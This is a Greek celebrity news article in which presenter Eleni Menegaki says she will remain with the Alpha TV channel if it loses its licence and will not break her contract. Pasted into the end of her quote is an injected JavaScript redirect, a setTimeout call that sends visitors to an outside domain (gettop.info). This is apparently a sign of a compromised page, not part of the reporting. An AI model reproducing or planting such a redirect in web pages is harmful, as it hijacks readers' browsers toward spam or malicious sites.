Η Ελένη απαντά τι θα κάνει αν κλείσει ο Alpha

0
8

 

Σε εκδήλωση για τον καρκίνο του μαστού παρευρέθη η Ελένη Μενεγάκη στο Δημοτικό Θέατρο Πειραιά κι εκεί οι δημοσιογράφοι είχαν την ευκαιρία να τη ρωτήσουν και για το τηλεοπτικό της μέλλον όπως και για το τι θα κάνει αν πέσει μαύρο στον Alpha.

«Αυτή τη στιγμή δεν με ενδιαφέρει τίποτε άλλο παρά μόνο να προχωρήσουν τα πράγματα, όπως έχουν. Πιστέψτε με ότι αγαπάω πολύ το κανάλι που με φιλοξενεί και δεν είναι τυχαίο ότι σην προηγούμενη σεζόν – και το λέω γιατί πολύ με ρώτησαν: «Καλά ανανέωσες συμβόλαιο ενώ δεν ήξερες ότι θα πάρει το κανάλι άδεια»;- ανανέωσα μία συμφωνία καλής σχέσης και συνεργασίας, όπως είχα όλα αυτά τα χρόνια» σημείωσε η γνωστή παρουσιάστρια, ενώ σχετικά με το «μαύρο» και το τι γενέσθαι μετά, υπογράμμισε:

«Το παρελθόν μου έχει αποδείξει και το μέλλον μου. Είμαι πάρα πολλά χρόνια σ’ αυτή τη δουλειά, συμβόλαια κάνω από το 1993, δεν έχω σπάσει ποτέ κανένα συμβόλαιο, δεν έχω φέρει τα πράγματα έτσι που να αναγκαστούν να πουν οι άλλοι «να φύγει να ησυχάσουμε από αυτήν» και γι’ αυτό ακριβώς δεν υπάρχει καμία περίπτωση εγώ να σπάσω συμβόλαιο από τον Alpha αν ο Alpha είναι όπως σήμερα. Δηλαδή, αν έχει εικόνα εγώ θα είμαι μέσα στον Alpha. Εγώ θα είμαι η τελευταία που θα φύγει από αυτό το «μαγαζί». Είμαι πολύ ευχαριστημένη, το αγαπώ πάρα πολύ και θα κλάψω πάρα πολύ, όπως και πάρα πολλοί άλλοι, αν θα κλείσει. Δεν θα είχα ανανεώσει συμβόλαιο πέρυσι, θα είχα κάτσει, θα έλεγα «δεν πειράζει, βλέπουμε μετά». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here